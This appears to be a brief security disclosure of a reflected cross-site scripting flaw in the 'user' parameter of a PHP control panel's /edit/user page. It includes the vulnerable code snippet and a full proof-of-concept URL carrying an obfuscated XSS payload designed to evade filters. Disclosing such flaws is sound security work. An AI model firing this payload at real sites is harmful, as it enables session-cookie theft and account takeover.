The user-controlled GET user parameter in index.php is unsanitized resulting in Cross-Site Scripting.
GET https://{HOST}/edit/user
**File: /web/edit/user/index.php#L11
// Check user argument
if (empty($_GET['user'])) {
header("Location: /list/user/");
exit;
}
https://{HOST}/edit/user/?user=<htmL/+/OnpOintEReNTEr%0d=%0d["XSS-HERE"].find(confirm)//
&token=1fb3da5a8992ed8fd9d95cfe828457d4
This vulnerability is capable of running malicious Javascript code on web pages, stealing a userβs cookie and gaining unauthorized access to that userβs account through the stolen cookie.